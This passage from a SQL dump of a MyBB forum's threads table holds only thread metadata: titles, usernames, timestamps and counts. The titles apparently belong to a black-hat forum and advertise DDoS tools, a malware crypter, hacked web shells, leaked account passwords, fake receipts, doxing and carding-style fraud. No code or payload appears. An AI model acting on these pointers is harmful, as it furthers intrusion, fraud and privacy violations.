'0', '0', '62', 'R?????zo?', '1350650947', '5593', '1350654913', 'R?????zo?', '62', '16', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('993', '12', 'Most complete guide to be anonymous', '0', '0', '0', '62', 'R?????zo?', '1350651294', '5595', '1351608864', 'Mac Miller', '302', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('994', '18', 'Getting IP\'s of Facebook contacts! [TUT]', '0', '0', '0', '62', 'R?????zo?', '1350651631', '5596', '1351218811', 'p420', '9', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('995', '16', 'How do you get PID\'s?', '0', '0', '0', '62', 'R?????zo?', '1350664827', '5606', '1350679449', 'R?????zo?', '62', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('996', '19', '[Junk]1000 PREMIUM ACCOUNTS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!', '0', '0', '0', '257', 'XxTREYZxX', '1350676921', '5622', '1350684281', 'VirtualLegend', '228', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('998', '12', 'Port Scanning Tutorial', '0', '0', '0', '5', 'Timmy', '1350703537', '5649', '1350850750', 'XxTREYZxX', '257', '6', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1004', '54', '[20 OKT]Brazzers,Bangbros,RK,...and more,all checked and working.', '0', '17', '0', '255', 'sbhshroy2', '1350708713', '5670', '1350724622', 'R?????zo?', '62', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1005', '54', '[20 oct] realitykings,ma.brazzers and many more active acounts for 20 oct. 2012', '0', '17', '0', '255', 'sbhshroy2', '1350709115', '5672', '1350724515', 'R?????zo?', '62', '2', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1006', '54', 'playboy premium acount for lifetime', '0', '17', '0', '255', 'sbhshroy2', '1350709799', '5676', '1350724549', 'R?????zo?', '62', '2', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1007', '54', 'uncommonporn premium acounts', '0', '0', '0', '255', 'sbhshroy2', '1350710106', '5678', '1350724588', 'R?????zo?', '62', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1021', '76', 'rage cheats and tips', '0', '0', '0', '257', 'XxTREYZxX', '1350800076', '5842', '1350800076', 'XxTREYZxX', '257', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1013', '16', 'The Official Magical Book of Free Food', '0', '0', '0', '62', 'R?????zo?', '1350748973', '5741', '1351216084', 'Romdu62', '7', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1008', '24', 'Desktop or Lappy?', '0', '0', '0', '205', 'mothered', '1350732548', '5702', '1350875325', 'Exposé', '222', '38', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1009', '74', 'minecraft server setup tut', '0', '0', '0', '257', 'XxTREYZxX', '1350737882', '5710', '1351034467', 'XxTREYZxX', '257', '21', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1010', '44', '[TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '0', '0', '62', 'R?????zo?', '1350738603', '5711', '1350747050', 'Apathy', '2', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1011', '44', '[TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '0', '0', '62', 'R?????zo?', '1350743760', '5715', '1350831901', 'R?????zo?', '62', '25', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1012', '16', 'Huge SE Dump', '0', '0', '0', '62', 'R?????zo?', '1350746764', '5721', '1350923416', 'R?????zo?', '62', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1014', '7', 'My awards Or My Achievements plugin ?!', '0', '0', '0', '228', 'VirtualLegend', '1350754961', '5756', '1350757415', 'sirchamp', '53', '29', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1019', '3', 'Do you like your new?', '0', '0', '0', '1', 't3h jok3r', '1350797591', '5836', '1350860469', 'iTzIpod', '82', '71', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1015', '7', 'Grounded', '0', '0', '0', '214', 'Rave™', '1350766905', '5791', '1350843604', 'iTzIpod', '82', '41', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1016', '7', 'Flying Steps', '0', '0', '0', '205', 'mothered', '1350772539', '5809', '1350821032', 'mothered', '205', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1017', '11', 'Wifi hacking help :O', '0', '0', '0', '257', 'XxTREYZxX', '1350782543', '5822', '1350873271', 'XxTREYZxX', '257', '30', '8', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1018', '47', 'giving away premium account', '0', '0', '0', '257', 'XxTREYZxX', '1350785225', '5826', '1350851522', 'XxTREYZxX', '257', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1020', '73', 'How to make your ipod\'s battery 90 percent longer', '0', '0', '0', '257', 'XxTREYZxX', '1350799793', '5840', '1351654586', 't3h jok3r', '1', '23', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1022', '72', 'how to make you pro at sniping MW3', '0', '0', '0', '257', 'XxTREYZxX', '1350800397', '5843', '1350800397', 'XxTREYZxX', '257', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1023', '4', 'New member here!!', '0', '0', '0', '258', 'PiXEL^OG', '1350800921', '5844', '1350841549', 'PiXEL^OG', '258', '39', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1027', '58', '[ Updated ] Marketers Group Request', '0', '17', '0', '228', 'VirtualLegend', '1350843854', '5909', '1350909386', 'R?????zo?', '62', '28', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1024', '72', 'mw3 intell locations.', '0', '17', '0', '257', 'XxTREYZxX', '1350809785', '5857', '1350809785', 'XxTREYZxX', '257', '4', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1025', '72', 'mw3 Black tuesday intell location', '0', '17', '0', '257', 'XxTREYZxX', '1350810091', '5858', '1350810091', 'XxTREYZxX', '257', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1026', '3', '1000 THREADS !!!!', '0', '0', '0', '228', 'VirtualLegend', '1350821588', '5869', '1350853095', 'Exposé', '222', '31', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1036', '30', 'Mega SEO Pack', '0', '0', '0', '62', 'R?????zo?', '1350860809', '5975', '1350906095', 'R?????zo?', '62', '6', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1028', '12', '[Tutorial] How to create a Fake Prank Wifi Access Point', '0', '0', '0', '4', 'Triple H', '1350847562', '5928', '1351030175', 'dccfoux', '285', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1029', '2', 'Testing new plugin v.1', '0', '0', '0', '1', 't3h jok3r', '1350856892', '5947', '1350856892', 't3h jok3r', '1', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1030', '2', 'Testing new plugin v.2', '0', '0', '0', '1', 't3h jok3r', '1350857082', '5948', '1350857295', 't3h jok3r', '1', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1031', '7', 'Testing new plugin public', '0', '0', '0', '1', 't3h jok3r', '1350857627', '5951', '1350938257', 'spacefish36', '8', '100', '18', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1041', '81', 'How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '0', '0', '100', '??zg???g????61', '1350861694', '5994', '1350921902', '??zg???g????61', '100', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1032', '3', 'Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '0', '0', '1', 't3h jok3r', '1350859516', '5960', '1350873877', 't3h jok3r', '1', '69', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1033', '30', '[FREEInstagram Bot [Worth 47$]', '0', '0', '0', '62', 'R?????zo?', '1350859569', '5961', '1351988055', 'iTzIpod', '82', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1034', '81', '[Cracked] Dark DDoSeR 5.1', '0', '0', '0', '62', 'R?????zo?', '1350859705', '5962', '1350861734', '??zg???g????61', '100', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1035', '20', 'NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '0', '0', '62', 'R?????zo?', '1350859841', '5963', '1350902334', 'VirtualLegend', '228', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1037', '30', 'Empireviews Type 2 Bot', '0', '0', '0', '62', 'R?????zo?', '1350860869', '5977', '1350913591', 'VirtualLegend', '228', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1038', '17', 'Viral Adult Goldmine™ Combined E-whoring Method?', '0', '0', '0', '62', 'R?????zo?', '1350861034', '5979', '1350861530', 'XxTREYZxX', '257', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1039', '61', 'Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '0', '0', '62', 'R?????zo?', '1350861266', '5984', '1351218606', 'p420', '9', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1042', '3', '[Bug] MyCodes in Signature', '0', '0', '0', '82', 'iTzIpod', '1350862152', '6000', '1350862243', 't3h jok3r', '1', '14', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1040', '61', 'How To Get Passes To Porn Sites', '0', '0', '0', '62', 'R?????zo?', '1350861351', '5986', '1352648872', 'VirtualLegend', '228', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1043', '58', '[NEW] Group Recruiting - DDoS\'ers', '0', '1', '0', '100', '??zg???g????61', '1350868687', '6019', '1350868687', '??zg???g????61', '100', '0', '0', '', '0', '0', '0', '', '-2', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1049', '49', 'User tagging anyone?', '0', '0', '0', '222', 'Exposé', '1350878377', '6057', '1350902512', 'VirtualLegend', '228', '17', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1044', '2', 'dkdadwa', '0', '0', '0', '61', 'NXK', '1350874777', '6036', '1350874777', 'NXK', '61', '6', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1045', '49', 'Group Format?', '0', '0', '0', '222', 'Exposé', '1350874906', '6037', '1350943512', 'Exposé', '222', '69', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1050', '7', 'What do you do to relax?', '0', '0', '0', '205', 'mothered', '1350878540', '6058', '1352562104', 'iTzIpod', '82', '22', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1046', '43', 'Free PID\'s :D', '0', '0', '0', '222', 'Exposé', '1350875931', '6046', '1350892661', 'Exposé', '222', '19', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1047', '16', 'Get free Otterbox cases!', '0', '0', '0', '222', 'Exposé', '1350876167', '6049', '1351303504', 'iTzIpod', '82', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1048', '64', 'Good sports stream!', '0', '0', '0', '61', 'NXK', '1350877760', '6055', '1350901356', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1088', '49', 'Best unique and useful suggestion', '0', '0', '0', '5', 'Timmy', '1351137172', '6327', '1351482501', 't3h jok3r', '1', '34', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1051', '58', 'Advertisers Applications', '0', '0', '0', '3', '??????????¢™', '1350880695', '6060', '1351023474', 'Anonymous™', '199', '33', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1052', '65', 'Wrong Turn 5 found it kinda boring', '0', '0', '0', '1', 't3h jok3r', '1350881174', '6061', '1350882590', 'Exposé', '222', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1053', '54', 'Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 22.OKT.2012', '0', '17', '0', '255', 'sbhshroy2', '1350900766', '6070', '1350900766', 'sbhshroy2', '255', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1054', '54', '[22 oct] Tonightsgirlfriend x 5 freshly cracked*No Download*', '0', '17', '0', '255', 'sbhshroy2', '1350900859', '6071', '1350900859', 'sbhshroy2', '255', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1055', '54', 'rapidshare Premium Account *No Download*', '0', '17', '0', '255', 'sbhshroy2', '1350900941', '6072', '1350902051', 'VirtualLegend', '228', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1064', '4', 'Greetings from NowhereLand', '0', '0', '0', '284', 'h3rcul3s', '1350916547', '6123', '1351034623', 'XxTREYZxX', '257', '27', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1072', '24', 'iPad Mini?', '0', '0', '0', '285', 'dccfoux', '1351030378', '6218', '1351051939', 'mothered', '205', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1056', '9', 'make money by shortening websites', '0', '17', '0', '255', 'sbhshroy2', '1350902461', '6083', '1351005405', 'sirchamp', '53', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1065', '5', 'We have a problem here.', '0', '0', '0', '61', 'NXK', '1350919907', '6127', '1350919907', 'NXK', '61', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1057', '9', 'oldest ptc site with more earning option', '0', '17', '0', '255', 'sbhshroy2', '1350902831', '6087', '1350902831', 'sbhshroy2', '255', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1058', '24', 'Microsoft or Apple', '0', '0', '0', '228', 'VirtualLegend', '1350903117', '6090', '1351138173', 'Romdu62', '7', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1059', '9', 'new ptc site with more earning option', '0', '17', '0', '255', 'sbhshroy2', '1350903502', '6092', '1351174019', 'sirchamp', '53', '24', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1060', '3', '[Bug] with the new plugin', '0', '0', '0', '62', 'R?????zo?', '1350910705', '6116', '1351122047', 'R?????zo?', '62', '55', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1061', '64', '[FREE] HUGE MOVIE LIST [DOWNLOAD]', '0', '0', '0', '62', 'R?????zo?', '1350911319', '6118', '1350911319', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1062', '64', 'New movie stream site I found!!', '0', '0', '0', '62', 'R?????zo?', '1350911603', '6120', '1350911603', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1063', '81', 'Free Private Shells [Updated]', '0', '0', '0', '62', 'R?????zo?', '1350911895', '6121', '1350939240', 'R?????zo?', '62', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1066', '48', 'We have a problem here.', '0', '0', '0', '61', 'NXK', '1350919962', '6128', '1350939105', 'NXK', '61', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1067', '24', 'AMD or intel', '0', '0', '0', '285', 'dccfoux', '1350943568', '6174', '1350993995', 'mothered', '205', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1068', '54', 'giganews (usenet)[vpn] acount for lifetime', '0', '15', '0', '255', 'sbhshroy2', '1350992146', '6184', '1350993126', 'R?????zo?', '62', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1069', '54', '[23 October] Premium Elite XXX Passes, All Checked And Working', '0', '15', '0', '255', 'sbhshroy2', '1350992268', '6185', '1350992957', 'R?????zo?', '62', '2', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1070', '7', 'How many hours a day are you online?', '0', '0', '0', '205', 'mothered', '1350998892', '6194', '1351260555', 'sirchamp', '53', '39', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1071', '3', 'VirtualLegend - banned?', '0', '0', '0', '264', 'D?ea', '1351011779', '6199', '1351107900', 'iTzIpod', '82', '61', '10', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1073', '64', 'Free Premium Netflix logins', '0', '0', '0', '5', 'Timmy', '1351043037', '6241', '1351218532', 'iTzIpod', '82', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1074', '84', '[NEW] App Trailers Exploit [HOT!]', '0', '0', '0', '5', 'Timmy', '1351044408', '6244', '1351472106', 'Apathy', '2', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1075', '9', '? AMAZON GIFTCARD METHOD[$180-240/MONTH] ?', '0', '0', '0', '7', 'Romdu62', '1351045084', '6245', '1351105973', 'NXK', '61', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1076', '34', '157 Graffiti Fonts [the best of all]', '0', '0', '0', '7', 'Romdu62', '1351045281', '6246', '1351390622', 'Romdu62', '7', '36', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1077', '47', 'Free chocolates and drinks', '0', '0', '0', '7', 'Romdu62', '1351046027', '6247', '1351215596', 'Romdu62', '7', '29', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1081', '43', 'Minecraft Accounts!! Over 20,000!', '0', '0', '0', '160', 'Jacob', '1351109254', '6284', '1351197885', 'iTzIpod', '82', '39', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1078', '7', 'Kasual/Rave\'s DOX (Thanks to NSA)', '0', '0', '0', '222', 'Exposé', '1351056377', '6254', '1352433223', 'Apathy', '2', '137', '18', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1079', '7', 'ADD ME ON SKYPE', '0', '0', '0', '257', 'XxTREYZxX', '1351064642', '6258', '1351108475', 'VirtualLegend', '228', '25', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1080', '13', '[FREASH] 4 ASP shelled sites!!!![hacked]', '0', '0', '0', '258', 'PiXEL^OG', '1351091701', '6270', '1351463824', 'p420', '9', '18', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1082', '74', 'WarZ', '0', '0', '0', '61', 'NXK', '1351111804', '6287', '1351118271', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1083', '4', 'Hey Guys', '0', '0', '0', '160', 'Jacob', '1351125122', '6300', '1351161221', 'R?????zo?', '62', '22', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1084', '4', 'hey guys', '0', '0', '0', '291', 'xXGANNONXx', '1351131193', '6311', '1351253318', 'NXK', '61', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1085', '71', '(help)optifine for minecraft', '0', '0', '0', '291', 'xXGANNONXx', '1351131536', '6313', '1351132483', 'XxTREYZxX', '257', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1086', '75', 'Skyrim Cheats and tips', '0', '0', '0', '291', 'xXGANNONXx', '1351132358', '6316', '1351662607', 'XxTREYZxX', '257', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1087', '74', 'GEARS OF WAR :P', '0', '0', '0', '257', 'XxTREYZxX', '1351133051', '6323', '1352000872', 'RAND0M1ZER', '262', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1089', '42', 'Homeless man saves officer from getting his ass whopped', '0', '0', '0', '5', 'Timmy', '1351137461', '6328', '1351215477', 'Romdu62', '7', '18', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1090', '8', 'What is this song called?', '0', '0', '0', '5', 'Timmy', '1351137598', '6329', '1351309139', 'XxTREYZxX', '257', '20', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1091', '56', 'Rate the avatar above you', '0', '0', '0', '257', 'XxTREYZxX', '1351143929', '6338', '1352551496', 'iTzIpod', '82', '166', '49', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1092', '82', 'Welcome New Members To The Marketers Palace', '0', '17', '0', '228', 'VirtualLegend', '1351151522', '6340', '1351151522', 'VirtualLegend', '228', '14', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1093', '7', 'I\'m back', '0', '0', '0', '257', 'XxTREYZxX', '1351152283', '6341', '1351390420', 't3h jok3r', '1', '44', '7', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1096', '7', 'Leaked e-book Pack [Lot\'s of stuff]', '0', '0', '0', '257', 'XxTREYZxX', '1351158423', '6357', '1351217686', 'XxTREYZxX', '257', '31', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1095', '8', 'Azz & Tittiez', '0', '0', '0', '228', 'VirtualLegend', '1351156575', '6354', '1351167973', 'mothered', '205', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1094', '58', 'The Marketers - Official Recruitment | Join us Today !', '0', '0', '0', '228', 'VirtualLegend', '1351155294', '6348', '1351549156', 'VirtualLegend', '228', '64', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1099', '16', 'Box Method and Drop Explained', '0', '0', '0', '7', 'Romdu62', '1351216534', '6401', '1351728048', 'NXK', '61', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1097', '9', 'Monetizing e-book', '0', '0', '0', '257', 'XxTREYZxX', '1351158574', '6358', '1351684387', 'VirtualLegend', '228', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1098', '9', 'CPA Headhunters - Learn How To Make Bank', '0', '0', '0', '228', 'VirtualLegend', '1351192844', '6375', '1351197440', 'R?????zo?', '62', '18', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1100', '42', '895 passwords not to use.', '0', '0', '0', '7', 'Romdu62', '1351217077', '6402', '1351390576', 'Romdu62', '7', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1101', '49', 'Dumps Section', '0', '0', '0', '8', 'spacefish36', '1351217673', '6409', '1351253187', 'NXK', '61', '15', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1102', '69', 'What kinds of programs have you coded before', '0', '0', '0', '8', 'spacefish36', '1351218025', '6412', '1351553941', 'RAND0M1ZER', '262', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1103', '3', 'Movie & TV RIPs, Streams etc', '0', '0', '0', '1', 't3h jok3r', '1351218130', '6413', '1351252899', 'mothered', '205', '10', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1104', '64', 'The raise of the apes (2011) movie rip available here', '0', '0', '0', '9', 'p420', '1351218445', '6418', '1351218445', 'p420', '9', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1105', '24', 'Windows 8 Officially released 26-10', '0', '0', '0', '205', 'mothered', '1351225585', '6427', '1351828953', 'mothered', '205', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1106', '49', 'Halloween Logo?', '0', '0', '0', '222', 'Exposé', '1351235974', '6430', '1351352571', 'iTzIpod', '82', '52', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1117', '82', 'Start Banking $297+ In 24hrs From Now....', '0', '0', '0', '228', 'VirtualLegend', '1351354461', '6499', '1351354461', 'VirtualLegend', '228', '9', '0', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1107', '15', 'Free] = DecFlooder v1.00 = [Free]', '0', '0', '0', '257', 'XxTREYZxX', '1351249473', '6441', '1351249473', 'XxTREYZxX', '257', '16', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1108', '12', 'How to Crash Small Websites', '0', '0', '0', '257', 'XxTREYZxX', '1351250715', '6442', '1351334986', 'VirtualLegend', '228', '15', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1110', '54', '[27 OKT]Brazzers,Bangbros,Realitykings,...and more WORKING PASSES FOR 27.OKT.2012', '0', '15', '0', '255', 'sbhshroy2', '1351280920', '6464', '1351280920', 'sbhshroy2', '255', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1109', '47', 'free vpn', '0', '0', '0', '255', 'sbhshroy2', '1351271375', '6458', '1351275258', 'sirchamp', '53', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1111', '54', '[27 oct]huge collection of porn acounts,more than 50 porn sites acount*no download*', '0', '0', '0', '255', 'sbhshroy2', '1351287012', '6466', '1351287012', 'sbhshroy2', '255', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1112', '49', 'SUGGESTION', '0', '0', '0', '257', 'XxTREYZxX', '1351309406', '6472', '1351482601', 't3h jok3r', '1', '34', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1120', '19', '[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '0', '0', '7', 'Romdu62', '1351390806', '6523', '1352249456', 't3h jok3r', '1', '51', '15', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1113', '54', '[27 0ct]huge collection of premium porn acounts. all checked and working', '0', '17', '0', '255', 'sbhshroy2', '1351315333', '6476', '1351444965', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1114', '49', 'AWARDS SUGGETION', '0', '0', '0', '257', 'XxTREYZxX', '1351316244', '6478', '1351337131', 'iTzIpod', '82', '11', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1115', '49', 'Update the logo....', '0', '0', '0', '222', 'Exposé', '1351316875', '6479', '1351462624', 'Timmy', '5', '97', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1116', '4', 'LOLLIPOP IN THE HOUSE :O', '0', '0', '0', '295', 'Lollipop123', '1351321647', '6481', '1351387123', 't3h jok3r', '1', '24', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1118', '9', '? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '0', '0', '53', 'sirchamp', '1351362966', '6503', '1352665871', 'VirtualLegend', '228', '646', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1119', '82', 'Simple Clickbank - Step By Step Tutorial 